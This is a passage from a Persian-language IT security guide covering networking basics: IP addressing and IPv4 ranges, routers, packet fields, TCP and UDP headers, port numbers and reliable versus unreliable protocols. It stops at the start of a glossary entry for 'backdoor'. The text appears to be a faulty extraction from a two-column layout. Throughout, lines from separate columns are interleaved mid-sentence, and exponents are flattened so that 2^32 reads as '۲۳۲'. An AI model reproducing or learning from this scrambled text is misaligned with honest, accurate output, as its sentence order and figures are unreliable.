‫ﻳﺎ ‪ datagram‬ﮔﻔﺘﻪ ﻣﻲﺷـﻮﺩ‪ IP .‬ﺩﺭ ‪ TCP/IP‬ﺑـﻪ ﻣﻌﻨـﺎﻱ‬
‫"ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ" ﺍﺳﺖ ﻭ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻛـﻪ ﻗﺎﻟـﺐ ﺩﺍﺧﻠـﻲ‬ ‫ﻫﺮ ﺍﺑﺰﺍﺭ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺍﺭﺍﻱ ﻳﻚ ﺁﺩﺭﺱ ‪ IP‬ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﺁﺩﺭﺱ‬
‫ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎ ﺑﺎﻳﺪ ﭼﮕﻮﻧﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺴﺘﺔ ‪ IP‬ﺷﺎﻣﻞ ﭼﻨـﺪﻳﻦ ﺑﺨـﺶ‬ ‫ﺑﻄﻮﺭ ﻛﻠﻲ ﺁﻥ ﺍﺑﺰﺍﺭ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨـﺪ؛‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻣﻴﺎﻥ ﺁﻥ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﻧﺪ‪:‬‬ ‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﺩﺭ ﺗﻤـﺎﻡ ﺩﻧﻴـﺎ ﺁﺩﺭﺱ ﺧﺎﻧـﺔ ﺷـﻤﺎ ﺭﺍ‬
‫ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪ .‬ﺁﺩﺭﺳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻧـﺴﺨﺔ ﺟـﺎﺭﻱ ‪TCP/IP‬‬
‫ﺍﻧﺪﺍﺯﺓ ﺑﺴﺘﻪ؛‬ ‫•‬
‫)ﻛﻪ ﺑﻪ ﻧﺎﻡ ‪ IPv4‬ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ( ﺍﻋﺪﺍﺩ ‪ ۳۲‬ﺑﻴﺘﻲ ﺩﻭﺩﻭﻳﻲ ﻫـﺴﺘﻨﺪ‪.‬‬
‫ﺁﺩﺭﺱ ‪ IP‬ﮔﻴﺮﻧﺪﻩ؛‬ ‫•‬ ‫ﻳﻌﻨﻲ ﺗﻌﺪﺍﺩ ﺁﺩﺭﺳﻬﺎﻱ ﻣﻤﻜـﻦ‪ ۲۳۲=۴۲۹۴۹۶۷۲۹۶ ،‬ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺁﺩﺭﺱ ‪ IP‬ﻣﺤﻠﻲ ﻛﻪ ﺑﺴﺘﻪ ﺍﺯ ﺁﻧﺠﺎ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ؛ ﻭ‬ ‫•‬
‫ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﻭ ﺑﺨﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺳﺎﺩﻩﺗـﺮ ﺁﻧﻬـﺎ‪ ،‬ﺍﻋـﺪﺍﺩ ‪ ۳۲‬ﺑﻴﺘـﻲ‬
‫ﺩﻭﺩﻭﻳﻲ ﺑﻪ ‪ ۴‬ﺑﺨـﺶ ‪ ۸‬ﺑﻴﺘـﻲ ﺗﻘـﺴﻴﻢﺑﻨـﺪﻱ ﺷـﺪﻩﺍﻧـﺪ‪ .‬ﭼـﻮﻥ‬
‫ﻧﻮﻉ ﺑﺴﺘﻪ‪.‬‬ ‫•‬ ‫‪ ۲۸=۲۵۶‬ﺍﺳﺖ‪ ،‬ﻫﺮ ﺑﺨﺶ ‪ ۸‬ﺑﻴﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻜﻲ ﺍﺯ ﺍﻋﺪﺍﺩ ‪ ۰‬ﺗـﺎ‬
‫ﻫﻨﮕﺎﻣﻴﻜــﻪ ﻳــﻚ ﺑــﺴﺘﻪ ﺍﺯ ﺭﺍﻳﺎﻧــﺔ ﺷــﻤﺎ ﺍﺭﺳــﺎﻝ ﻣــﻲﺷــﻮﺩ ﺑــﻪ‬ ‫ﻻ ﺑﺪﻧﺒﺎﻝ ﻫﻢ ﻣﻲﺁﻳﻨﺪ ﻭ ﺑـﺎ ﻳـﻚ‬ ‫‪ ۲۵۵‬ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ‪ ۴‬ﺷﻤﺎﺭﻩ ﻣﻌﻤﻮ ﹰ‬
‫ﻧﺰﺩﻳﻜﺘﺮﻳﻦ ﻣﺴﻴﺮﻳﺎﺏ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﺁﻥ ﻧﻴﺰ ﺳﻌﻲ ﻣﻲﻛﻨـﺪ‬ ‫ﻧﻘﻄﻪ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺗﻔﻜﻴﻚ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻛـﻮﭼﻜﺘﺮﻳﻦ ﺁﺩﺭﺱ‬
‫ﺑﺴﺘﻪ ﺭﺍ ﺩﺭ ﻃﻮﻝ ﻣﺴﻴﺮ ﺑﻪ ﻣﺴﻴﺮﻳﺎﺏ ﺑﻌﺪﻱ ﺍﺭﺳﺎﻝ ﻛﻨـﺪ ﻭ ﺍﻳـﻦ‬ ‫ﺍﻳﻨﺘﺮﻧﺘــﻲ ‪ 0.0.0.0‬ﻭ ﺑﺰﺭﮔﺘــﺮﻳﻦ ﺁﻥ ‪255.255.255.255‬‬
‫ﻛﺎﺭ ﺍﺩﺍﻣﻪ ﻣﻲﻳﺎﺑﺪ ﺗﺎ ﺑﺴﺘﻪ ﺑﻪ ﻣﻘﺼﺪ ﺧﻮﺩ ﺑﺮﺳـﺪ‪ .‬ﺍﮔـﺮ ﻣـﺸﻜﻠﻲ‬ ‫ﺍﺳﺖ‪ .‬ﻧﻤﻮﻧـﺔ ﻳـﻚ ﺁﺩﺭﺱ ‪ IP‬ﺑـﻪ ﺷـﻜﻞ ‪24.200.195.15‬‬
‫ﺑﻮﺟﻮﺩ ﺁﻳﺪ ﻳﺎ ﺗﺮﺍﻛﻢ ﺑﺴﺘﻪﻫﺎ ﺯﻳﺎﺩ ﺑﺎﺷﺪ ﺑﺴﺘﻪ ﻧﻤـﻲﺗﻮﺍﻧـﺪ ﺍﺭﺳـﺎﻝ‬ ‫ﻣﻲ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺑﺰﺍﺭﻱ ﺑﻨﺎﻡ ﻣﺴﻴﺮﻳﺎﺏ‪ ١٤٦‬ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ‬
‫ﺷﻮﺩ ﻭ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ ﻣﺘﻮﻗﻒ ﺧﻮﺍﻫﺪ ﺷﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴـﻞ ﺑـﻪ ‪IP‬‬ ‫ﻣﺴﻴﺮ ﻫﺮ ﺁﺩﺭﺱ ‪ IP‬ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﺪ ﻭ ﻣﻲﺩﺍﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ‬
‫ﭘﺮﻭﺗﻜﻞ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ‪ ١٥١‬ﻣﻲﮔﻮﻳﻨﺪ‪ .‬ﺍﮔﺮﭼـﻪ ﻃﺒـﻖ ﺗﺌـﻮﺭﻱ‬ ‫ﺩﺳﺖﻳﺎﻓﺘﻦ ﺑﻪ ﻫﺮ ﺁﺩﺭﺱ ﺑﺎﻳﺪ ﻛﺪﺍﻡ ﻣﺴﻴﺮ ﺭﺍ ﺑﺮﮔﺰﻳﺪ‪.‬‬

‫‪147‬‬ ‫‪Domain Name Services‬‬


‫‪148‬‬ ‫‪Hostname‬‬
‫‪149‬‬ ‫‪Internet Protocol‬‬
‫‪150‬‬ ‫‪Packet‬‬ ‫‪146 Router‬‬
‫‪151‬‬ ‫‪Unreliable Protocol‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١١٢‬‬

‫ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﻓﺮﺳﺘﺎﺩﻥ ﺗﺮﺗﻴﺒﻲ ﺍﻃﻼﻋﺎﺕ ﺳﺒﺐ ﻣﻲﺷﻮﺩ ﻛﻪ‬ ‫‪ IP‬ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻧﻴﺴﺖ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﺗﻤﺎﻣﻲ ﺑﺴﺘﻪﻫـﺎﻱ‬
‫ﺑﺮﻧﺎﻣﺔ ﺩﺭﻳـﺎﻓﺘﻲ ﺍﻳـﻦ ﻗـﺴﻤﺘﻬﺎ ﺭﺍ ﺑـﺎ ﺗﺮﺗﻴﺒـﻲ ﺻـﺤﻴﺢ ﻣﺠـﺪﺩﹰﺍ‬ ‫ﺍﺭﺳﺎﻟﻲ ﺭﺍ ﺑﻪ ﻣﻘﺼﺪ ﻣﻲﺭﺳﺎﻧﺪ‪.‬‬
‫ﮔﺮﺩﺁﻭﺭﻱ ﻧﻤﺎﻳﺪ‪ .‬ﺍﻣﺎ ﺑﻪ ﺩﻻﻳﻞ ﻣﺘﻌـﺪﺩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﻌـﻀﻲ ﺍﺯ‬ ‫ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻔﻲ ﺍﺯ ﺑﺴﺘﻪﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺭﺳﺎﻝ ﺷﻮﻧﺪ‬
‫ﺑﺴﺘﻪﻫﺎ ﺳﺮﻳﻌﺘﺮ ﺍﺯ ﺑﺴﺘﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺑﻪ ﻣﻘﺼﺪ ﺑﺮﺳﻨﺪ ﻭ ﺍﻳﻦ ﺑﺪﺍﻥ‬ ‫ﺍﻣﺎ ﺩﺭ ﺍﻳﻨﺠﺎ ﺗﻨﻬﺎ ﺑﻪ ﺩﻭ ﻧﻮﻉ ﺍﺯ ﺁﻧﻬﺎ ﺍﺷـﺎﺭﻩ ﻣـﻲﻛﻨـﻴﻢ‪ TCP :‬ﻭ‬
‫ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﺑﺴﺘﻪﻫﺎ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﻨﺪ ﺧﺎﺭﺝ ﺍﺯ ﺗﺮﺗﻴﺒﻲ ﻛﻪ ﻓﺮﺳﺘﺎﺩﻩ‬ ‫‪.UDP‬‬
‫ﺷﺪﻩﺍﻧﺪ ﺩﺭﻳﺎﻓﺖ ﺷﻮﻧﺪ‪ .‬ﺍﺯ ﺳﻮﻱ ﺩﻳﮕﺮ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻃﺒـﻖ ﺗﺌـﻮﺭﻱ‬
‫ﻣﺎﻫﻴﺖ ‪ IP‬ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻧﻴﺴﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺍﺯ ﺑﺴﺘﻪﻫﺎ‬ ‫‪١٥٢‬‬
‫‪ :TCP‬ﭘﺮﻭﺗﻜﻞ ﻛﻨﺘﺮﻝ ﺍﻧﺘﻘﺎﻝ‬
‫ﻫﺮﮔﺰ ﺑﻪ ﻣﻘﺼﺪ ﻧﺮﺳﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣـﻮﺭﺩ ﺑﺮﻧﺎﻣـﺔ ﺩﺭﻳـﺎﻓﺘﻲ ﻣﺘﻮﺟـﻪ‬
‫‪ TCP‬ﭘﺮﻭﺗﻜﻠﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﻴﺸﺘﺮ ﭘﻴﺎﻣﻬﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ﺷﺎﻣﻞ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﻳﻚ ﺷﻜﺎﻑ ﻣﻴﺎﻥ ﺗﺮﺗﻴﺐ ﺩﺭﻳﺎﻓﺖ ﺑﺴﺘﻪﻫـﺎ ﺭﺥ ﺩﺍﺩﻩ‬
‫ﻭﺏ )‪ ،(HTTP‬ﭘﺮﻭﺗﻜـــﻞ ﺍﻧﺘﻘـــﺎﻝ ﻓﺎﻳـــﻞ )‪ ١٥٣(FTP‬ﻭ ﻧﺎﻣـــﺔ‬
‫ﺍﺳﺖ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﺪ ﻛـﻪ ﺑـﺴﺘﺔ ﮔـﻢ ﺷـﺪﻩ ﻣﺠـﺪﺩﹰﺍ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲ ﺑﺎﺷﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺩﺍﺩﺓ ﺍﺭﺳـﺎﻝﺷـﺪﻩ‪ ،‬ﺑـﺴﺘﻪ ﻫـﺎﻱ‬
‫ﺍﺭﺳﺎﻝ ﺷﻮﺩ‪.‬‬
‫‪ TCP‬ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﻫﻢ ﻣﻲﺑﺎﺷﻨﺪ‪:‬‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﻓﺮﺳﺘﻨﺪﻩ ﻳـﻚ ﺑـﺴﺘﺔ ‪ TCP‬ﺑﻔﺮﺳـﺘﺪ‪ ،‬ﺍﻳـﻦ ﺍﻧﺘﻈـﺎﺭ‬ ‫‪١٥٤‬‬
‫‪ ۱۶‬ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺍﺭﺳﺎﻟﻲ؛‬ ‫•‬
‫ﻣﻲﺭﻭﺩ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺑﺎ ﺑﺎﺯﭘﺲ ﻓﺮﺳـﺘﺎﺩﻥ ﺍﻃﻼﻋـﺎﺕ‬
‫‪١٥٥‬‬
‫ﺗﺼﺪﻳﻘﻲ ﻣﺨـﺼﻮﺹ‪ ،‬ﺩﺭﻳﺎﻓـﺖ ﺁﻧـﺮﺍ ﺗـﺼﺪﻳﻖ ﻛﻨـﺪ‪ .‬ﺍﮔـﺮ ﭘﻴـﺎﻡ‬ ‫‪ ۱۶‬ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺩﺭﻳﺎﻓﺘﻲ؛‬ ‫•‬
‫ﺗﺼﺪﻳﻖ ﻳﻚ ﺑﺴﺘﻪ ﺩﺭ ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﻣﺸﺨﺺﺷﺪﻩﺍﻱ ﺑـﺎﺯ ﻧﮕـﺮﺩﺩ‪،‬‬ ‫ﺍﻃﻼﻋﺎﺕ ﺗﺮﺗﻴﺒﻲ‪ ١٥٦‬ﺑﺴﺘﻪﻫﺎ؛ ﻭ‬ ‫•‬
‫ﺑﺴﺘﻪ ﻣﺠﺪﺩﹰﺍ ﺍﺭﺳﺎﻝ ﺧﻮﺍﻫﺪ ﺷﺪ‪ .‬ﺑﻪ ﺩﻟﻴﻞ ﻭﺟﻮﺩ ﺍﻋﺪﺍﺩ ﺗﺮﺗﻴﺒـﻲ ﻭ‬ ‫‪١٥٧‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺗﺼﺪﻳﻘﻲ‪.‬‬ ‫•‬
‫ﺗﺼﺪﻳﻘﻲ ﺑﺴﺘﻪﻫﺎ‪ TCP ،‬ﻳﻚ ﭘﺮﻭﺗﻜﻞ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ‪ ١٥٨‬ﺍﺳـﺖ ﻭ‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ‪ ،‬ﻛـﺎﺭﺑﺮ‬ ‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻓﻘﻂ ﻳﻚ ﺁﺩﺭﺱ ‪ IP‬ﺩﺍﺭﺩ ﺍﺯ ﺷﻤﺎﺭﻩ ﭘـﻮﺭﺕ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺍﺷﺘﺒﺎﻩ ﻭ ﻳـﺎ ﺧﻄـﺎ ﺩﺭ‬ ‫ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﭘﻴﺎﻡ ﺭﺍ ﺍﺭﺳﺎﻝ ﻭ ﻳﺎ ﺩﺭﻳﺎﻓﺖ‬
‫ﺍﻧﺘﻘﺎﻝ ﻳﺎ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﺟﺮﻳﺎﻥ ﺁﻥ ﻗﺮﺍﺭ ﺧﻮﺍﻫـﺪ‬ ‫ﻣﻲﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺍﺳﺖ ﻛﻪ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫـﺪ‬
‫ﮔﺮﻓﺖ‪.‬‬ ‫ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﭼﻨﺪﻳﻦ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﺑﺎﺯ ﺑﺎﺷﺪ ﻭ ﺑﺘﻮﺍﻥ ﺑﻮﺳـﻴﻠﺔ ﺁﻧﻬـﺎ‬
‫ﺻﻔﺤﺎﺕ ﺩﺭﺧﻮﺍﺳﺘﻲ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻧﻤﻮﺩ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻳـﻚ ﺑﺮﻧﺎﻣـﻪ‬
‫‪١٥٩‬‬
‫‪ :UDP‬ﭘﺮﻭﺗﻜﻞ ‪ datagram‬ﻛﺎﺭﺑﺮ‬ ‫ﭘﻴﺎﻡ ‪ TCP‬ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﺑﺎﻳﺪ ﺭﻭﻱ ﭘﻮﺭﺕ ﺻـﺤﻴﺤﻲ ﻣﻨﺘﻈـﺮ‬
‫‪ UDP‬ﻗﺎﻟﺐ ﺳﺎﺩﻩﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﻣـﻮﺭﺩ‬ ‫ﻻ ﺑﺮﺍﻱ ﻫﺮ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ ﺧـﺎﺹ‪ ،‬ﻳـﻚ‬ ‫ﭘﻴﺎﻡ ﺑﻤﺎﻧﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﻫﺮ ﺑﺴﺘﺔ ‪ UDP‬ﻋﻼﻭﻩ ﺑﺮ ﺩﺍﺩﻩﻫـﺎ ﺩﺍﺭﺍﻱ‬ ‫ﭘﻮﺭﺕ ﻣﺸﺨﺺ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﭘﻮﺭﺕ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﻧﻴﺰ ﻫﺴﺖ‪:‬‬ ‫ﻭﺏ ﻫﻤﻴﺸﻪ ﭘﻮﺭﺕ ﺷﻤﺎﺭﺓ ‪ ۸۰‬ﺍﺳـﺖ‪ .‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻳـﻚ ﭘﻨﺠـﺮﺓ‬
‫ﻣﺮﻭﺭﮔﺮ ﺭﺍ ﺑﺎﺯ ﻣﻲﻛﻨﻴﺪ ﺗﻘﺮﻳﺒﹰﺎ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﻳﻚ ﭘﻮﺭﺕ ﺭﺍ ﺑﺮﺍﻱ‬
‫‪ ۱۶‬ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺍﺭﺳﺎﻟﻲ؛ ﻭ‬ ‫•‬
‫ﺧﻮﺩ ﺍﻧﺘﺨﺎﺏ ﻣﻲﻛﻨﺪ )ﻃﺒﻖ ﻗﺮﺍﺭﺩﺍﺩ‪ ،‬ﺑﺰﺭﮔﺘﺮ ﺍﺯ ‪ (۱۰۲۳‬ﻭ ﺍﻳـﻦ ﻫﻤـﺎﻥ‬
‫‪ ۱۶‬ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺩﺭﻳﺎﻓﺘﻲ‪.‬‬ ‫•‬ ‫ﭘﻮﺭﺗﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﺭﻭﻱ ﺁﻥ ﻣﻨﺘﻈﺮ ﭘﻴﺎﻡ ﺍﻳﺴﺘﺎﺩ‪.‬‬
‫ﺩﺭ ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﻣﺎﻧﻨﺪ ‪ ،TCP‬ﺑﻪ ﺩﻟﻴﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﻤﺎﺭﻩﻫﺎﻱ ﭘﻮﺭﺕ‬ ‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻃﻮﻝ ﺑﺴﺘﻪﻫﺎﻱ ‪ IP‬ﻣﺤﺪﻭﺩ ﺍﺳﺖ ﻭ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ‬
‫ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﻣﺨﺘﻠﻔــﻲ ﺑﺘﻮﺍﻧﻨــﺪ ﺑﻄــﻮﺭ ﻣــﻮﺍﺯﻱ‬ ‫ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﻴﺎﺭ‬
‫ﺭﺷﺘﻪ ﻫﺎﻱ ‪ UDP‬ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻭ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣﺎﻧﻨـﺪ‬ ‫ﺑﻴﺸﺘﺮ ﺍﺯ ﺁﻥ ﺑﺎﺷﺪ‪ ،‬ﺍﻃﻼﻋـﺎﺕ ﺑﺎﻳـﺪ ﺑـﻪ ﻗـﺴﻤﺘﻬﺎﻱ ﻛـﻮﭼﻜﺘﺮﻱ‬
‫ﺩﺭﻳﺎﻓﺖ ﭘﻴـﺎﻡ ﺩﺭ ‪ ،TCP‬ﺑﺮﻧﺎﻣـﻪ ﺑﺎﻳـﺪ ﺭﻭﻱ ﭘـﻮﺭﺕ ﺻـﺤﻴﺤﻲ‬ ‫ﺗﻘﺴﻴﻢ ﮔﺮﺩﻧﺪ‪ .‬ﻫﺮ ﻗﺴﻤﺖ ﺩﺭ ﻗﺎﻟﺐ ﺑﺴﺘﺔ ‪ TCP‬ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ‬
‫ﻣﻨﺘﻈﺮ ﺩﺭﻳﺎﻓﺖ ﭘﻴﺎﻡ ﺑﻤﺎﻧـﺪ‪ .‬ﺩﺭ ‪ UDP‬ﻫـﻴﭻ ﺷـﺮﻁ ﻣﺸﺨـﺼﻲ‬
‫ﺑﺮﺍﻱ ﺗﺮﺗﻴﺐﺑﻨﺪﻱ ﻭ ﺗﺼﺪﻳﻖ ﺑـﺴﺘﻪﻫـﺎ ﻭﺟـﻮﺩ ﻧـﺪﺍﺭﺩ‪ ،‬ﻟـﺬﺍ ﺍﻳـﻦ‬
‫‪152 Transmission Control Protocol‬‬
‫‪153. File Transfer Protocol‬‬
‫‪154 Sending Port Number‬‬
‫‪155 Receiving Port Number‬‬
‫‪158 Reliable Protocol‬‬ ‫‪156 Sequencing Information‬‬
‫‪159 User Datagram Protocol‬‬ ‫‪157 Acknowledgement Information‬‬
‫‪١١٣‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﭘﺮﻭﺗﻜﻞ ﻧﻴﺰ ﻫﻤﺎﻧﻨﺪ ‪ IP‬ﻧﺎﻣﻄﻤﺌﻦ ﺍﺳﺖ ﻭ ﭘﻴﺎﻣﻬﺎ ﺩﺭ ﺁﻥ ﻣﻤﻜـﻦ‬


‫ﺍﺳﺖ ﮔﻢ ﺷﻮﻧﺪ‪ UDP .‬ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ ﻛـﻪ ﮔـﻢ‬
‫ﺷﺪﻥ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﭘﻴﺎﻣﻬﺎ ﺍﻫﻤﻴﺖ ﭼﻨﺪﺍﻧﻲ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﻭ ﻳـﺎ ﺭﺍﻩ‬
‫ﺳﺎﺩﻩ ﺍﻱ ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﭘﻴﺎﻣﻬﺎﻱ ﮔﻤـﺸﺪﻩ ﻣﻮﺟـﻮﺩ ﺑﺎﺷـﺪ‪ .‬ﺍﻣـﺎ ﺍﺯ‬
‫ﻣﺰﺍﻳﺎﻱ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺍﻳﻦ ﻧﻜﺘﻪ ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ ﭼـﻮﻥ‬
‫ﻫﻴﭻ ﺗﺼﺪﻳﻖ ﻭ ﺗﺮﺗﻴﺐﺑﻨﺪﻱ ﺧﺎﺻﻲ ﺩﺭ ‪ UDP‬ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﺍﻳـﻦ‬
‫ﭘﺮﻭﺗﻜﻞ ﻣﻨﺎﺑﻊ ﺑﺴﻴﺎﺭ ﻛﻤﺘﺮﻱ ﺍﺯ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫‪١١٥‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫‪١٦٣‬‬
‫ﺩﺭﺏ ﻣﺨﻔﻲ‬
‫ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﮔﺬﺭ ﺍﺯ ﻭﺭﻭﺩ ﻋﺎﺩﻱ ﻭ ﺍﻳﻤـﻦ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻭ‬
‫ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﻛﻨﺘﺮﻝ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑـﺪﻭﻥ ﻛـﺴﺐ ﺍﺟـﺎﺯﻩ ﺍﺯ‬
